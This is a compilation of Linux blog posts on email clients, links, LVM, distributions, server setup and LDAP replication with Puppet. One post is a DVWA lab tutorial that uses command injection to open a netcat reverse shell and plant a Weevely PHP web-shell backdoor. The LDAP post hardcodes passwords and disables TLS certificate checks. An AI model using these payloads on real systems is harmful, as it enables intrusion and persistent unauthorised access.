FOSSPicks » Linux Magazine

Graham reviews Thunderbird 60, Stress-Terminal UI, Taskbook, SolveSpace, Star Ruler 2, and more!

Email client

Thunderbird 60

As much as online proprietary services would like old-school email to go away, it’s not dead yet. The great thing about email is that it’s truly peer-to-peer and open: it enables any of us to run our own mail domain and send and receive messages from our own servers or computers. That openness is also email’s biggest problem, because “anyone” includes spammers, and there are thousands of them. There are defenses against spam (SpamAssassin and Rspamd, for instance), and email remains amazingly useful. In the end, we still need a desktop email client. Roundcube and other online services are great, but they can’t compete with the desktop integration and offline access of a proper application like Mozilla’s Thunderbird.

Thunderbird used to be the go-to desktop email application, regardless of your operating system and desktop environment, but its development stalled. Fortunately, there was enough community concern for Thunderbird and its pivotal role as one of the only usable open source email clients that development has restarted. This is the first major Thunderbird release under the new regime, and one hopes the first of many as Mozilla rewrites the codebase, drops the old Firefox technologies, and builds an email client fit for the future. That doesn’t mean this release is short on updates – far from it. After a long period of stable release stasis, version 60 really does contain many new features and fixes. For that reason, it doesn’t automatically upgrade from old versions. Keeping with the times, there are now light and dark themes thanks to the use of Firefox’s Photon design, and excellent FIDO U2F support for two-factor authentication with various devices. There’s also experimental support for conversion between the MBOX and Maildir mail storage formats, which is particularly useful for Linux users who historically started with one and now want to switch to the other.

When composing messages, there are several improvements to the way attachments are handled, allowing you to reorder them. The attachment pane appears when you first start writing an email, and when it holds attachments but is hidden, a paperclip icon is shown as a reminder. You can also remove recipients by clicking a delete button that’s displayed when you move your cursor over the To/Cc/Bcc selector, and you can save a message as a template for other messages, creating them with the New Message from Template command. Native Linux notifications have also been reinstated. Besides these changes, there are lots of fixes that aren’t obvious. The calendar now allows copying, cutting, and deleting across a single or recurring event, and it’s now much easier to see event locations in the week and day calendar views. Thunderbird is starting to feel alive again. While there are still some major features we’d like to see, such as integrated and simplified OpenPGP to strengthen Thunderbird’s privacy credentials, we’re just pleased the project is being worked on at all. Here’s to the next release!

[…]


Source

Understanding Linux Links – Linux.com

Along with cp and mv, both of which we talked about at length in the previous installment of this series, links are another way of putting files and directories where you want them to be. The advantage is that links let you have one file or directory show up in several places at the same time.

As noted previously, at the physical disk level, things like files and directories don’t really exist. A filesystem conjures them up for our human convenience. At the disk level, there is an index (in most Linux filesystems, a table of inodes) that lives near the beginning of each partition, with the data scattered over the rest of the disk.

This index maps where each directory and file starts and ends. When you load a file from your disk, your operating system looks up the entry in the index, and the index says where the file starts on the disk and where it finishes. The disk head moves to the start point, reads the data until it reaches the end point and, hey presto: here’s your file.

Hard Links

A hard link is simply an extra index entry that points to an area of the disk that has already been assigned to a file. In other words, a hard link points to data that has already been indexed by another entry. Let’s see how this works.

Open a terminal, create a directory for tests and move into it:

mkdir test_dir
cd test_dir

Create a file by touching it:

touch test.txt

For extra excitement (?), open test.txt in a text editor and add a few words to it.

Now make a hard link by executing:

ln test.txt hardlink_test.txt

Run ls, and you’ll see your directory now contains two files… Or so it would seem. As you read before, what you are really seeing is two names for the exact same file: hardlink_test.txt contains the same content, takes up no extra space on the disk (try this with a large file to check), and shares the same inode as test.txt:

$ ls -li *test*
16515846 -rw-r--r-- 2 paul paul 14 oct 12 09:50 hardlink_test.txt
16515846 -rw-r--r-- 2 paul paul 14 oct 12 09:50 test.txt

The -i option of ls shows the inode number of a file. An inode is the chunk of information in the filesystem’s index that records the location of the file or directory on the disk, the last time it was modified, and other data. If two files share the same inode number, they are, to all practical effects, the same file, regardless of where they are located in the directory tree.
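You can also query both entries directly. The 2 in the listing above (between the permissions and the owner) is the hard link count, and a quick check with GNU stat, printing inode, link count, and name, confirms the two names are one file:

$ stat -c '%i %h %n' test.txt hardlink_test.txt
16515846 2 test.txt
16515846 2 hardlink_test.txt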

Fluffy Links

Soft links, also known as symlinks, are different: a soft link is a genuinely independent file with its own inode and its own little slot on the disk, but it contains only a snippet of data that points the operating system to another file or directory.

You can create a soft link using ln with the -s option:

ln -s test.txt softlink_test.txt

This will create the soft link softlink_test.txt to test.txt in the current directory.

By running ls -li again, you can see the difference between the two kinds of links:

$ ls -li
total 8
16515846 -rw-r--r-- 2 paul paul 14 oct 12 09:50 hardlink_test.txt
16515855 lrwxrwxrwx 1 paul paul 8 oct 12 09:50 softlink_test.txt -> test.txt
16515846 -rw-r--r-- 2 paul paul 14 oct 12 09:50 test.txt

hardlink_test.txt and test.txt contain the same text and *literally* occupy the same space; they also share the same inode number. Meanwhile, softlink_test.txt occupies much less space and has a different inode number, marking it as a different file altogether. Using ls’s -l option also shows the file or directory your soft link points to.
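One practical difference shows up when the target disappears. A minimal sketch, run in the same test_dir (this deletes test.txt, so only try it once you are done experimenting):

$ rm test.txt
$ cat softlink_test.txt
cat: softlink_test.txt: No such file or directory
$ cat hardlink_test.txt
(your words are still here)

The soft link now dangles, while the hard link still works: it points at the inode, not at the name.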

Why Use Links?

Links are good for applications that come with their own environment. It often happens that your Linux distro does not come with the latest version of an application you need. Take the case of the fabulous Blender 3D design software. Blender allows you to create 3D still images as well as animated films, and who wouldn’t want that on their machine? The problem is that the current version of Blender is always at least one version ahead of the one found in any distribution.

Fortunately, Blender provides downloads that run out of the box. Apart from the program itself, these packages contain a complex framework of libraries and dependencies that Blender needs to work. All these bits and pieces come within their own hierarchy of directories.

Every time you want to run Blender, you could cd into the folder you downloaded it to and run:

./blender

But that is inconvenient. It would be better if you could run the blender command from anywhere in your file system, as well as from your desktop command launchers.

The way to do that is to link the blender executable into a bin/ directory. On many systems, you can make the blender command available from anywhere in the file system by linking to it like this:

ln -s /path/to/blender_directory/blender /home/<username>/bin
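For this to work, the bin/ directory has to exist and be on your PATH (many distributions add ~/bin to the PATH automatically if it exists). A minimal sketch, assuming a hypothetical unpack location of ~/Downloads/blender-2.79 and the user paul from the examples above:

$ mkdir -p ~/bin
$ ln -s ~/Downloads/blender-2.79/blender ~/bin/blender
$ which blender
/home/paul/bin/blender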

Another case in which you will need links is for software that needs outdated libraries. If you list your /usr/lib directory with ls -l, you will see a lot of soft-linked files fly by. Take a closer look, and you will see that the links usually have names similar to the original files they link to. You may see libblah linking to libblah.so.2, and then you may even notice that libblah.so.2 links in turn to libblah.so.2.1.0, the original file.

This is because applications often require older versions of a library than what is installed. The problem is that, even if the more modern versions are still compatible with the older versions (and usually they are), the program will bork if it doesn’t find the version it is looking for. To solve this problem, distributions often create links so that the picky application believes it has found the older version, when, in reality, it has only found a link and ends up using the more up-to-date version of the library.

Somewhat related is what happens with programs you compile yourself from source code. Programs you compile yourself often end up installed under /usr/local: the program itself ends up in /usr/local/bin, and it looks for the libraries it needs in the /usr/local/lib directory. But say your new program needs libblah, and libblah lives in /usr/lib, which is where all your other programs look for it. You can link it into /usr/local/lib by doing:

ln -s /usr/lib/libblah /usr/local/lib

Or, if you prefer, by cd’ing into /usr/local/lib

cd /usr/local/lib

… and then linking with:

ln -s ../../lib/libblah

There are dozens more cases in which linking proves useful, and you will undoubtedly discover them as you become more proficient in using Linux, but these are the most common. Next time, we’ll look at some linking quirks you need to be aware of.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Linux Today – KDE Plasma 5.14 Desktop Environment Gets First Point Release, Update Now

Oct 17, 2018, 14:00

(Other stories by Marius Nestor)

Released last week on October 9, 2018, the KDE Plasma 5.14 desktop environment brought improvements to the Plasma Discover package manager, a new firmware update feature, various user interface enhancements, new and better desktop effects, as well as slicker animations in the KWin window manager.

Now, the first point release, KDE Plasma 5.14.1, is available with an extra layer of improvements. Among the highlights of the KDE Plasma 5.14.1 point release are keyboard support for navigating desktop icons and the KonsoleProfiles applet, focus handling fixes, a fix for visual artifacts caused by KWin’s maximize effect, better Flatpak and Snap support in Plasma Discover, and firmware update (fwupd) improvements.


Source

Linux Logical Volume Manager Video Tutorial

In this series of video tutorials, you will learn what LVM is and when you should use it. You’ll discover how LVM creates and uses layers of abstraction between storage devices and file systems including Physical Volumes, Volume Groups, and Logical Volumes.

More importantly, you’ll learn how to configure LVM, starting with the pvcreate command to configure physical volumes, the vgcreate command to configure volume groups, and the lvcreate command to create logical volumes.

Plus, you’ll see how easy it is to extend file systems and logical volumes using the lvextend command. Likewise, adding more space to the storage pool is painless with the vgextend command.

Next, you’ll learn how to create mirrored logical volumes and even how to migrate data from one storage device to another, without taking any downtime.
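As a taste of what the videos walk through, here is a minimal command sketch of that workflow; /dev/sdb and /dev/sdc are hypothetical spare disks, so substitute your own devices:

# Physical volume -> volume group -> logical volume
pvcreate /dev/sdb
vgcreate vg_data /dev/sdb
lvcreate -n lv_data -L 10G vg_data
mkfs.ext4 /dev/vg_data/lv_data

# Grow the pool with a second disk, then extend the LV and its filesystem
vgextend vg_data /dev/sdc
lvextend -r -L +5G /dev/vg_data/lv_data   # -r resizes the filesystem too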

Introduction to the Logical Volume Manager (LVM)

Layers of Abstraction in LVM

Creating Physical Volumes (PVs), Volume Groups (VGs), and Logical Volumes (LVs)

Extending Volume Groups and Logical Volumes

Mirroring Logical Volumes

Removing Logical Volumes, Physical Volumes, and Volume Groups

Migrating Data from One Storage Device to Another

Logical Volume Manager – Summary

More Linux System Administration Resources

LVM Companion Workbook

Source

Linux Scoop — Linux Lite 4.0

Linux Lite 4.0 – See What’s New

Linux Lite 4.0, codenamed “Diamond,” is the latest release of Linux Lite. It is based on Ubuntu 18.04 and powered by the Linux 4.15 kernel series, and it comes with a brand new icon theme and system theme, namely Papirus and Adapta, the Timeshift app installed by default for system backups, and new, in-house built Lite applications.

Among the new Lite applications, we can mention the Lite Desktop, which manages application icons and other objects on the desktop, and Lite Sounds, a tool designed to help users manage system-wide sounds. Also, Linux Lite 4.0 ships with the MenuLibre tool to help you easily edit application menu entries and Shotwell for basic image management.

Linux Lite 4.0 Release Notes

Source

How to Check Physical Network Cable Connection Status on Linux

Method 1

Using dmesg

Using dmesg is one of the first things to do to inquire about the current state of the system:

Example:

dmesg | sed '/eth.*Link is/h;$!d;x'

[1667676.292871] e1000e: eth0 NIC Link is Up 100 Mbps Full Duplex, Flow Control: Rx/Tx

Method 2

/sys/class/net/

cat /sys/class/net/eth0/carrier

1

The number 1 in the output above means that a network cable is physically connected to your network card.

Or

cat /sys/class/net/eth0/operstate

up
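To check every interface at once using only sysfs, a small loop over operstate should do. (This is a minimal sketch; operstate is used rather than carrier because reading carrier on an interface that is down fails with an "Invalid argument" error.)

for i in /sys/class/net/*; do echo -n "$(basename $i): "; cat $i/operstate; done

Sample output (will vary by machine):

eth0: up
lo: unknown
wlan0: down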

Method 3

Using ethtool command

Syntax: ethtool interface_name | grep 'Link d'

Example:

ethtool eth0 | grep 'Link d'

Link detected: yes

We can use a bash for loop to check all network interfaces at once:

for i in $( ls /sys/class/net ); do echo -n "$i "; ethtool $i | grep 'Link d'; done

Sample output:

eth0 Link detected: yes
eth1 Link detected: no
lo Link detected: yes
wlan0 Link detected: no

NOTE:

The only problem with the above ethtool output is that it will not detect a connected cable if your network interface is down. Consider the following example:

# ethtool eth0 | grep 'Link d'
Link detected: yes
# ifconfig eth0 down
# ethtool eth0 | grep 'Link d'
Link detected: no
# ifconfig eth0 up
# ethtool eth0 | grep 'Link d'
Link detected: yes
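If the interface is down and you still want to test the cable, one workaround is to bring the link up just long enough to negotiate. A minimal sketch (requires root; the sleep gives the NIC a moment to detect the carrier):

# ip link set eth0 up
# sleep 3
# ethtool eth0 | grep 'Link d'
Link detected: yes
# ip link set eth0 down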

Source

Create a Back Door on DVWA with Kali, Netcat and Weevely – LSB – ls /blog

Welcome back, my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. In our network, the Kali machine is at 192.168.56.103 and the Metasploitable machine hosting DVWA is at 192.168.56.101.


We will be creating a backdoor through DVWA’s Command Execution module; DVWA is a web app running on Metasploitable.


To start with, change the security setting from high to low in the DVWA Security tab.


Next, we move to the Command Execution module. The page just does a ping scan, so let’s try it.


We will enter an IP address and click on submit.



Let’s see if it will also run commands other than ping. We will try to run a Netcat listener, so on the Kali machine command line type:

nc -vv -l -p 8888 (8888 is the port we want to listen on)


Next, in DVWA, type any IP address, then ;, then nc -e /bin/sh 192.168.56.103 8888, and submit to connect back to the listener on the Kali machine.


Connection established, we have full control of the web app.



Now that we have full command-line control of the website, we can run any commands we wish. Next, we want to create a persistent backdoor and upload it to the website.

First, we need to generate a backdoor with Weevely. Back on the Kali machine, in a new console window, type:

weevely generate 123456 /root/shell.txt

123456 is the password, which we will use later.


Copy it to /var/www/html so we can see it in our browser:

cp /root/shell.txt /var/www/html


Make sure it’s copied: shell.txt should now be in /var/www/html.


Next, we start the Apache server on the Kali machine:

service apache2 start


In the Kali browser, go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm the file is there.


We still have a Netcat connection to the server, so we can wget our shell.txt file from it:

wget http://192.168.56.103/shell.txt


The file has been uploaded; next, we need to give it a .php extension so it will run:

mv shell.txt shell.php


Connect to the uploaded shell from Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456


We are connected with a backdoor in DVWA. Now that we have the backdoor, we can run some helpful commands, for instance:

:help will give you a list of commands you can run on your backdoor. Interesting ones are:

:system_info


cat /etc/passwd


Another interesting command we can use is :audit_etcpasswd -vector <option>

To move files between your machine and the target system, use :file_upload and :file_download, where rpath is the remote path and lpath the local one.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13


Source

How to Install ionCube Loader on Ubuntu 16.04 – LinuxCloudVPS Blog

In this article, we will perform an installation of ionCube Loader on an Ubuntu 16.04 server. First, we will explain what ionCube is, and then we will proceed with step-by-step instructions for installing it and checking that it is installed on Ubuntu 16.04. ionCube Loader is a PHP extension that loads and runs PHP files encoded with the ionCube encoder. In other words, ionCube is an encoding tool used to ensure that your PHP applications are not redistributed illegally and are not modified or read by anyone.

In order to follow this tutorial you will need:

  • Ubuntu 16.04 server
  • A web server like Apache or Nginx with PHP installed

1. Find and choose the right ionCube version

The first thing you need to know is that the ionCube version must match your installed PHP version. So, to continue, we need some information about which version of PHP our web server is using.

To retrieve information about the current PHP configuration on your server, we are going to use a small script. We will create a file named info.php in the web server’s root directory (by default /var/www/html, unless you’ve changed it) using your favorite text editor, or simply use nano as shown in our example.

$ sudo nano /var/www/html/info.php

Add the code shown below and nothing more.

<?php
phpinfo();

Save the changes and close the file.

Now open your favorite browser and visit http://server_ip_address/info.php

The visited page shows the standard phpinfo() output.

From the page header, we can see which PHP version our web server uses. In this example, we use PHP version 7.0.30, and the Server API line shows that we are using Apache 2.0.

Once we have this information on our server, we can proceed with the next step that is downloading and installing.

2. Installing and setting up ionCube

We will now visit the official ionCube download page and copy the link for your OS and architecture. In our example, we will use the zip archive for 64-bit Linux. You can download it to your server with this command:

$ wget https://downloads.ioncube.com/loader_downloads/ioncube_loaders_lin_x86-64.zip

Extract the archive with this command:

$ unzip ioncube_loaders_lin_x86-64.zip

Extracting the zip file creates a directory containing loader files for multiple versions of PHP. From the unpacked directory, we pick the file matching the PHP version we currently use on our server, which in this example is PHP 7.0. So, we will copy the file ioncube_loader_lin_7.0.so into the PHP extensions directory with the following command:

$ sudo cp ioncube/ioncube_loader_lin_7.0.so /usr/lib/php/20151012/

You can always check the location of the PHP extensions directory at http://server_ip_address/info.php by looking for the extension_dir line.

The next step is to add the extension to the PHP configuration so that PHP loads ionCube. There are two ways to do this:

  • First is to modify the main php.ini configuration (which is not recommended).
  • Second is to create a separate file and have it load before the other extensions to avoid possible conflicts.

In this example, we will use the second option and create a separate file. Once again, we need a location where we can create our own configuration file. To find it, return to http://server_ip_address/info.php and search for “Scan this dir for additional .ini files”.

With the following command, we will create a file named 00-ioncube.ini in the /etc/php/7.0/apache2/conf.d directory:

$ sudo nano /etc/php/7.0/apache2/conf.d/00-ioncube.ini

We use 00 at the beginning of the file name so that it is loaded before all other PHP configuration files.

Add the loading directive and then save the file:

zend_extension = "/usr/lib/php/20151012/ioncube_loader_lin_7.0.so"

Once we restart the web server, the above changes will take effect.

For Nginx web server run:

$ sudo systemctl restart nginx

For Apache web server run:

$ sudo systemctl restart apache2.service

And if you use the php-fpm service, it’s best to restart that as well:

$ sudo systemctl restart php7.0-fpm.service

Now let’s check whether ionCube is installed and enabled.

3. Confirm the ionCube installation

In this last step, we will confirm that ionCube has been successfully installed and enabled. Go back to your browser and refresh http://server_ip_address/info.php. If the loader is enabled, the page header will now mention the ionCube PHP Loader.

With this, we are sure that the ionCube PHP extension is properly installed and enabled.
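You can also verify this from the command line. Note that the 00-ioncube.ini file above was created for the Apache SAPI only; the CLI reads its own directory, /etc/php/7.0/cli/conf.d. A quick sketch of enabling and checking it there too:

$ sudo cp /etc/php/7.0/apache2/conf.d/00-ioncube.ini /etc/php/7.0/cli/conf.d/
$ php -v

If the loader is active, php -v prints an extra line mentioning the ionCube PHP Loader.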

Now, the last thing we need to do is remove the info.php script. Our recommendation is not to keep this script, because it exposes a lot of server information that could be used by potential attackers.

$ sudo rm /var/www/html/info.php

Also, we will remove the downloaded ionCube archive and the unpacked directory, because they are no longer needed and only take up space on the server.

$ sudo rm ioncube_loaders_lin_x86-64.zip

$ sudo rm -rf ioncube

Congratulations, we now have a fully established and functional ionCube extension. With this, we have secured the environment for all our PHP applications.


Source

CollectD System Performance Monitor Installation on CentOS 7

Collectd is a daemon that collects system performance data and metrics. The data it collects can either be processed locally or sent to a central logging server. Collectd is easy to configure and set up, and it can report to various metric analytics platforms. This is a guide to installing the daemon on CentOS 7. You can read more about the project here. The platform is robust and offers hundreds of plugins for monitoring various services. Once you have installed it, you can use the metrics to find bottlenecks in system performance and potential opportunities for improvement.

Install CollectD

Make sure everything is up to date:

yum update
yum upgrade

The required packages are contained in the EPEL repository, so you will need to install that first:

yum install epel-release

Then install the service itself:

yum install collectd

Configure CollectD

Once it has been installed, you can edit the configuration to match what you need to monitor. The configuration is located at /etc/collectd.conf. There are numerous plugins you can enable to monitor different aspects of the server or its services. In this particular guide, we are going to leave the base install as it is and just update the hostname:

nano /etc/collectd.conf

Un-comment this line and set it to match your server’s hostname:

#Hostname "localhost"

If this hostname does not actually resolve, you will want to uncomment

#FQDNLookup true

And set it to false

FQDNLookup false
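If you later want more than the base install, enabling a plugin is usually just a matter of un-commenting its LoadPlugin line in the same file. A minimal sketch (cpu, memory, load, and df all ship with the default package; the df block restricting collection to the root filesystem is an optional example):

LoadPlugin cpu
LoadPlugin memory
LoadPlugin load
LoadPlugin df

<Plugin df>
  MountPoint "/"
</Plugin>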

You will need to enable the service on CentOS 7:

systemctl enable collectd

Then you can go ahead and start the logging daemon:

systemctl start collectd

You can verify it’s running by checking its status:

# systemctl status collectd
● collectd.service - Collectd statistics daemon
   Loaded: loaded (/usr/lib/systemd/system/collectd.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2017-09-06 22:05:51 EDT; 4 days ago
     Docs: man:collectd(1)
           man:collectd.conf(5)
 Main PID: 8497 (collectd)
   CGroup: /system.slice/collectd.service
           └─8497 /usr/sbin/collectd

You are looking for an ‘Active: active (running)’ status. That’s it for installing the service itself; we will be releasing more guides on configuring the various platforms it can report to.

Sep 11, 2017 | LinuxAdmin.io

Source

Configure OpenLDAP Master/Slave Replication with Puppet | Lisenet.com

We’re going to use Puppet to configure a pair of OpenLDAP servers with a master-slave replication.

This article is part of the Homelab Project with KVM, Katello and Puppet series.

Homelab

We have two CentOS 7 servers installed which we want to configure as follows:

ldap1.hl.local (10.11.1.11) – will be configured as an LDAP master
ldap2.hl.local (10.11.1.12) – will be configured as an LDAP slave

Both servers have SELinux set to enforcing mode.

See the image below to identify the homelab part this article applies to.

Configuration with Puppet

Puppet master runs on the Katello server. We use the camptocamp-openldap Puppet module to configure OpenLDAP. Please see the module documentation for supported features and available configuration options.

See here (CentOS 7) and here (Debian) for blog posts on how to configure an OpenLDAP server manually.

Note that instructions below apply to both LDAP servers.

Firewall configuration to allow LDAPS access from homelab LAN:

firewall { '007 allow LDAPS':
  dport  => [636],
  source => '10.11.1.0/24',
  proto  => tcp,
  action => accept,
}

Ensure that the private key (which we created previously) is available in PKCS#8 format.

file { '/etc/pki/tls/private/hl.pem':
  ensure => file,
  source => 'puppet:///homelab_files/hl.pem',
  owner  => '0',
  group  => 'ldap',
  mode   => '0640',
}

Configure the LDAP server (note how we bind to the SSL port):

class { 'openldap::server':
  ldap_ifs  => ['127.0.0.1:389/'],
  ldaps_ifs => ['0.0.0.0:636/'],
  ssl_cert  => '/etc/pki/tls/certs/hl.crt',
  ssl_key   => '/etc/pki/tls/private/hl.pem',
}

Configure the database:

openldap::server::database { 'dc=top':
  ensure    => present,
  directory => '/var/lib/ldap',
  suffix    => 'dc=top',
  rootdn    => 'cn=admin,dc=top',
  rootpw    => 'cGfSAyREZC5XnJa77iP+EdR8BrvZfUuo',
}

Configure schemas:

openldap::server::schema { 'cosine':
  ensure => present,
  path   => '/etc/openldap/schema/cosine.schema',
}
openldap::server::schema { 'inetorgperson':
  ensure  => present,
  path    => '/etc/openldap/schema/inetorgperson.schema',
  require => Openldap::Server::Schema['cosine'],
}
openldap::server::schema { 'nis':
  ensure  => present,
  path    => '/etc/openldap/schema/nis.ldif',
  require => Openldap::Server::Schema['inetorgperson'],
}

Configure ACLs:

$homelab_acl = {
  '0 to attrs=userPassword,shadowLastChange' => [
    'by dn="cn=admin,dc=top" write',
    'by dn="cn=reader,dc=top" read',
    'by self write',
    'by anonymous auth',
    'by * none',
  ],
  '1 to dn.base=""' => [
    'by * read',
  ],
  '2 to *' => [
    'by dn="cn=admin,dc=top" write',
    'by dn="cn=reader,dc=top" read',
    'by self write',
    'by users read',
    'by anonymous auth',
    'by * none',
  ],
}
openldap::server::access_wrapper { 'dc=top':
  acl => $homelab_acl,
}

Base configuration:

file { '/root/.ldap_config.ldif':
  ensure => file,
  source => 'puppet:///homelab_files/ldap_config.ldif',
  owner  => '0',
  group  => '0',
  mode   => '0600',
  notify => Exec['configure_ldap'],
}
exec { 'configure_ldap':
  command  => 'ldapadd -c -x -D cn=admin,dc=top -w PleaseChangeMe -f /root/.ldap_config.ldif && touch /root/.ldap_config.done',
  path     => '/usr/bin:/usr/sbin:/bin:/sbin',
  provider => shell,
  onlyif   => ['test -f /root/.ldap_config.ldif'],
  unless   => ['test -f /root/.ldap_config.done'],
}

Content of the file ldap_config.ldif can be seen below.

We create a read-only account, cn=reader,dc=top, for LDAP replication; we also create an LDAP user, uid=tomas,ou=Users,dc=hl.local,dc=top, to log into the homelab servers.

dn: cn=reader,dc=top
objectClass: simpleSecurityObject
objectclass: organizationalRole
description: LDAP Read-only Access
userPassword: NrBn6Kd4rW8jmf+KWmfbTMFOkcC43ctF

dn: dc=hl.local,dc=top
o: hl.local
dc: hl.local
objectClass: dcObject
objectClass: organization

dn: ou=Users,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Users

dn: uid=tomas,ou=Users,dc=hl.local,dc=top
uid: tomas
uidNumber: 5001
gidNumber: 5001
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
userPassword: aBLnLxAUZAqwwII6fNUzizyOY/YAowtt
cn: Tomas
gn: Tomas
sn: Admin
mail: [email protected]
shadowLastChange: 16890
shadowMin: 0
shadowMax: 99999
shadowWarning: 14
shadowInactive: 3
loginShell: /bin/bash
homeDirectory: /home/guests/tomas

dn: ou=Groups,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Groups

dn: cn=tomas,ou=Groups,dc=hl.local,dc=top
gidNumber: 5001
objectClass: top
objectClass: posixGroup
cn: tomas

LDAP Master Server

Configure sync provider on the master node:

file { '/root/.ldap_syncprov.ldif':
  ensure => file,
  source => 'puppet:///homelab_files/ldap_syncprov.ldif',
  owner  => '0',
  group  => '0',
  mode   => '0600',
  notify => Exec['configure_syncprov'],
}
exec { 'configure_syncprov':
  command  => 'ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_syncprov.ldif && touch /root/.ldap_syncprov.done && systemctl restart slapd',
  path     => '/usr/bin:/usr/sbin:/bin:/sbin',
  provider => shell,
  onlyif   => [
    'test -f /root/.ldap_syncprov.ldif',
    'test -f /root/.ldap_config.done',
  ],
  unless   => ['test -f /root/.ldap_syncprov.done'],
}

Content of the file ldap_syncprov.ldif for the master server can be seen below.

dn: cn=module,cn=config
objectClass: olcModuleList
cn: module
olcModulePath: /usr/lib64/openldap
olcModuleLoad: syncprov.la

dn: olcOverlay=syncprov,olcDatabase=hdb,cn=config
objectClass: olcOverlayConfig
objectClass: olcSyncProvConfig
olcOverlay: syncprov
olcSpSessionLog: 100

LDAP Slave Server

Configure replication on the slave node:

file { '/root/.ldap_replication.ldif':
  ensure => file,
  source => 'puppet:///homelab_files/ldap_replication.ldif',
  owner  => '0',
  group  => '0',
  mode   => '0600',
  notify => Exec['configure_replication'],
}
exec { 'configure_replication':
  command  => 'ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_replication.ldif && touch /root/.ldap_replication.done && systemctl restart slapd',
  path     => '/usr/bin:/usr/sbin:/bin:/sbin',
  provider => shell,
  onlyif   => ['test -f /root/.ldap_config.done'],
  unless   => ['test -f /root/.ldap_replication.done'],
}

Content of the file ldap_replication.ldif for the slave server is below. Note how we bind to the SSL port.

dn: olcDatabase=hdb,cn=config
changetype: modify
add: olcSyncRepl
olcSyncRepl: rid=001
 provider=ldaps://ldap1.hl.local:636/
 searchbase="dc=hl.local,dc=top"
 type=refreshAndPersist
 retry="60 10 300 +"
 schemachecking=on
 bindmethod=simple
 binddn="cn=reader,dc=top"
 credentials=PleaseChangeMe
 tls_reqcert=never
 tls_cert=/etc/pki/tls/certs/hl.crt
 tls_cacert=/etc/pki/tls/certs/hl.crt
 tls_key=/etc/pki/tls/private/hl.pem

The Result

We should end up with the following LDAP structure:


Anything that gets created on the LDAP master should be automatically synced to the slave.
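A quick way to verify the replication is to add an entry on the master and then query the slave directly, binding with the read-only replication account (a minimal sketch; the bind password is the replication credential used above):

$ ldapsearch -x -H ldaps://ldap2.hl.local:636 \
    -D "cn=reader,dc=top" -w PleaseChangeMe \
    -b "dc=hl.local,dc=top" "(uid=tomas)" dn

If the uid=tomas entry comes back from the slave, the replication is working.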

Debugging LDAP Issues

If you hit problems, try running the following to start the LDAP server in debug mode with logging to the console:

# slapd -h ldapi:/// -u ldap -d 255

The logs can be difficult to parse, but with a Google search and a bit of luck, you should be able to work out what is going on.

Configure All Homelab Servers to use LDAP Authentication

We use Puppet module sgnl05-sssd to configure SSSD.

Add the following to the main homelab environment manifest file /etc/puppetlabs/code/environments/homelab/manifests/site.pp so that it gets applied to all servers.

Note how SSSD is configured to use both LDAP servers for redundancy.

class { '::sssd':
  ensure => 'present',
  config => {
    'sssd' => {
      'domains'             => 'default',
      'config_file_version' => 2,
      'services'            => ['nss', 'pam'],
    },
    'domain/default' => {
      'id_provider'           => 'ldap',
      'auth_provider'         => 'ldap',
      'cache_credentials'     => true,
      'default_shell'         => '/bin/bash',
      'mkhomedir'             => true,
      'ldap_search_base'      => 'dc=hl.local,dc=top',
      'ldap_uri'              => 'ldaps://ldap1.hl.local,ldaps://ldap2.hl.local',
      'ldap_id_use_start_tls' => false,
      'ldap_tls_reqcert'      => 'never',
      'ldap_default_bind_dn'  => 'cn=reader,dc=top',
      'ldap_default_authtok'  => 'PleaseChangeMe',
    },
  },
}

After Puppet applies the configuration above, we should be able to log into all homelab servers with the LDAP user.

Source
